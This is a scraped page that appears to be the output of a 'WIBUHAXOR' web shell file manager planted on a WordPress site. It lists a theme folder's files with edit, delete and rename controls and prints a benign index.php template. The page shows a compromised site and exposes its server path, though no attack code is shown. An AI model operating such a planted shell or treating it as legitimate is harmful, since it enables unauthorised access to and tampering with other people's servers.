-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
public_html
/
wp-content
/
themes
/
consultera
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
css
--
NONE
header
--
NONE
images
--
NONE
inc
--
NONE
js
--
NONE
page-templates
--
NONE
template-parts
--
NONE
.htaccess
0.231KB
Edit File
Delete File
Rename
404.php
1.742KB
Edit File
Delete File
Rename
archive.php
1.073KB
Edit File
Delete File
Rename
comments.php
5.804KB
Edit File
Delete File
Rename
footer.php
0.585KB
Edit File
Delete File
Rename
functions.php
8.229KB
Edit File
Delete File
Rename
header.php
0.901KB
Edit File
Delete File
Rename
index-banner.php
0.499KB
Edit File
Delete File
Rename
index.php
1.351KB
Edit File
Delete File
Rename
page.php
1.796KB
Edit File
Delete File
Rename
readme.txt
5.224KB
Edit File
Delete File
Rename
screenshot.png
246.162KB
Edit File
Delete File
Rename
search.php
1.376KB
Edit File
Delete File
Rename
searchform.php
0.389KB
Edit File
Delete File
Rename
sidebar-footer.php
0.09KB
Edit File
Delete File
Rename
sidebar-woocommerce.php
0.334KB
Edit File
Delete File
Rename
sidebar.php
0.364KB
Edit File
Delete File
Rename
single.php
0.526KB
Edit File
Delete File
Rename
style.css
102.354KB
Edit File
Delete File
Rename
template-homepage.php
0.129KB
Edit File
Delete File
Rename
woocommerce.php
1.474KB
Edit File
Delete File
Rename
<?php /** * The main template file * * This is the most generic template file in a WordPress theme * and one of the two required files for a theme (the other being style.css). * It is used to display a page when nothing more specific matches a query. * E.g., it puts together the home page when no home.php file exists. * * @link https://developer.wordpress.org/themes/basics/template-hierarchy/ * * @package consultera */ get_header(); // breadcrumb section get_template_part('index','banner');?> <section class="section-padding-100 white-bg" id="site-content"> <div class="container"> <div class="row"> <?php if(class_exists( 'WooCommerce' )){ if( is_account_page() || is_cart() || is_checkout() ) { echo '<div class="col-lg-'.( !is_active_sidebar( "woocommerce" ) ?"12" :"8" ).' col-12">'; } else{ echo '<div class="col-lg-'.( !is_active_sidebar( "sidebar-1" ) ? "12" :"8" ).' col-12">'; } } else { echo '<div class="col-lg-'.( !is_active_sidebar( "sidebar-1" ) ? "12" :"8" ).' col-12">'; } if ( have_posts() ) : /* Start the Loop */ while ( have_posts() ) : the_post(); get_template_part( 'template-parts/content', 'page' ); if ( comments_open() || get_comments_number() ) : comments_template(); endif; endwhile; else : get_template_part( 'template-parts/content', 'none' ); endif; ?> </div> <?php if ( class_exists( 'WooCommerce' ) ) { if( is_account_page() || is_cart() || is_checkout() ) { get_sidebar('woocommerce'); } else{ get_sidebar(); } } else { get_sidebar(); } ?> </div> </div> </section> <?php get_footer();
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat